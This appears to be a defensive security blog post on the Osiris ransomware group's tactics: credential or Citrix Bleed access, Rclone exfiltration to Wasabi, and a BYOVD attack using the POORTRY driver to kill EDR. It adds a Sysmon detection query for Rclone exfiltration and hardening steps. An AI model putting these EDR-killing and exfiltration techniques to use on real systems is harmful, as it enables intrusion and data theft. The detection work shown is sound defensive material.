How Osiris Ransomware Exposed the EDR Myth
Emerging in late 2025, the Osiris RaaS group deployed a kernel-level EDR termination technique against enterprise targets across Southeast Asian healthcare and critical infrastructure — days before any encryption payload landed.
By the time defenders noticed the encryption, the data was already gone and endpoint protection had been silently killed from the inside. The attack vector wasn’t a zero-day. It was a legitimately signed driver.
This article breaks down exactly how Osiris ransomware 2026 operates, why your current EDR configuration may not survive it, and the specific Sysmon queries that give you a fighting chance at catching it early.
What You’ll Learn
- Why the 2026 strain doesn’t share code with 2016 Locky
- How BYOVD tactics blind your SOC team completely
- Why legitimate tools like Wasabi are your primary warning
- Exact Sysmon Event ID 1 queries to catch early exfiltration
- How aspiring analysts can hunt for kernel-level threats
Osiris ransomware 2026 doesn’t break through your defenses — it disables them first.
Osiris ransomware 2026 is a sophisticated RaaS threat that disables EDR systems using BYOVD (Bring Your Own Vulnerable Driver) attacks. It typically utilizes the POORTRY driver to gain kernel-level access, allowing it to terminate security software before encrypting data with AES-128-CTR and exfiltrating files to cloud providers like Wasabi.
Osiris isn’t just another encryption script; it’s a systematic EDR lobotomy. The most dangerous part of this attack isn’t the encryption phase at all. It’s the moment attackers turn your multi-million dollar endpoint protection into a silent, useless brick before you even know they are inside. Traditional detection mechanisms are failing under the weight of this new methodology.
The EDR Killer: Why Osiris Ransomware 2026 is a Tier-1 Threat
Think of Osiris ransomware as a strike team that cuts the fiber lines and knocks out the guards before they even touch the vault. Emerging in late 2025 as a highly sophisticated Ransomware-as-a-Service (RaaS) operation, Osiris represents a stark reality for enterprise defenders. According to the 2026 Symantec/Carbon Black report, ransomware actors claimed 4,737 attacks in 2025.
While the 2025 Sophos threat report noted the average ransom payment dropped to $1.0M, the frequency of these mid-tier, highly targeted hits is accelerating. Southeast Asian food service operators, healthcare facilities, and critical infrastructure are taking the brunt of the damage.
Osiris proves that if you own the driver, you own the detection. Once attackers secure administrative rights, your security software is simply uninstalled by force.
A Tale of Two Osiris’s: Clearing the Threat Intel Trap
Don’t confuse this with the 2016 Locky variant. They share a name; they don’t share code. Relying on legacy threat feeds that confuse the two will leave your SOC flying blind. If your detection engineers are hunting for decade-old Locky hashes, the new Osiris operators will walk right past your perimeter.
Audit your SIEM and threat intelligence platforms immediately. Ensure your feeds are specifically tracking the 2025/2026 Osiris RaaS indicators and modern LotL (Living off the Land) tool signatures.
The Osiris Attack Anatomy: From Initial Access to Extortion
Osiris operators are incredibly methodical. They rely heavily on dual-use tools to blend into your daily administrative network traffic. The intrusion usually starts with compromised RDP credentials or the exploitation of edge vulnerabilities. A prime example is the heavy targeting of Citrix NetScaler flaws like CVE-2023-4966 (Citrix Bleed) for initial access.
Once inside, they establish a foothold, but the actual ransomware payload won’t drop for days.
Hunting Osiris: Catching Exfiltration Before the EDR Lobotomy
Because the ransomware payload effectively ends your visibility, catching the exfiltration phase is your best chance at stopping Osiris. The threat actors frequently use Rclone to push sensitive data to legitimate cloud storage providers like Wasabi or Mega. You cannot wait for a massive bandwidth alert; you need to hunt for the process creation.
If you are using Sysmon Event ID 1 queries, look for Event ID 1 (Process Creation) targeting Rclone executions with specific command-line arguments:
EventID: 1 Image: *\rclone.exe CommandLine: *--config* AND *--ignore-existing* Destination: *.wasabisys.com*
The Sysmon query above targets Rclone’s characteristic arguments. Osiris operators also rename Rclone to evade basic name-matching — monitor by behavior and destination, not filename alone.
The “Killer” Move: BYOVD and the POORTRY Driver
This is the exact moment Osiris separates itself from script-kiddie ransomware operations. Before deploying the encryptor, the attackers execute a Bring Your Own Vulnerable Driver (BYOVD) attack.
The attackers drop a tool called KillAV alongside the POORTRY driver (also tracked as Abyssworker). POORTRY exploits a known vulnerability within a legitimately signed driver. Because the signature is cryptographically valid, Windows allows it to load. From the kernel (Ring 0), they have ultimate authority and brutally kill all EDR processes from the bottom up.
User-mode protections cannot stop kernel-mode attacks. If an attacker achieves administrative rights and drops a vulnerable driver, your EDR cannot defend itself.
The Final Blow: Unbreakable Encryption
Once the environment is blind and your data is sitting in an attacker-controlled Wasabi bucket, Osiris executes the final payload. First, it deletes Volume Shadow Copies (VSS) to ensure you cannot easily restore your servers. Then, it initiates a hybrid encryption scheme utilizing ECC and AES-128-CTR.
What You Should Do Now
If You’re a Security Professional
- Hunt for LotL Tools: Query your SIEM for the execution of Rustdesk, Rclone, Netscan, or MeshAgent.
- Implement Driver Blocklists: Enforce Microsoft’s Vulnerable Driver Blocklist via WDAC to prevent known drivers like POORTRY from loading.
- Monitor Cloud Storage Traffic: Create alerts for outbound traffic destined for Wasabi or Mega.
If You’re an Aspiring Analyst
- Learn Kernel Debugging Basics: Understand the difference between Ring 3 and Ring 0 execution.
- Master Sysmon Telemetry: Practice writing queries for Event ID 1 and Event ID 3.
- Write Custom YARA Rules: Identify behavioral execution of tools like Rustdesk being renamed.
Frequently Asked Questions
The EDR Myth Is Exposed — Now What?
Osiris ransomware 2026 is a sobering reminder that no single security control is a guarantee. When attackers can weaponize a legitimately signed driver to silence your endpoint protection from the kernel level, the perimeter is not where this fight is won or lost. Visibility into LotL tool execution, Rclone exfiltration behavior, and vulnerable driver loads is what keeps defenders one step ahead.
The SOC teams that survive this threat will be the ones hunting before the encryption phase — not responding after it. Implement the WDAC driver blocklist, deploy granular Sysmon logging, and treat any Rclone execution as a critical priority alert.
Have you caught unauthorized remote access tools or Rclone syncing in your environment before a major incident? Share your experience in the comments.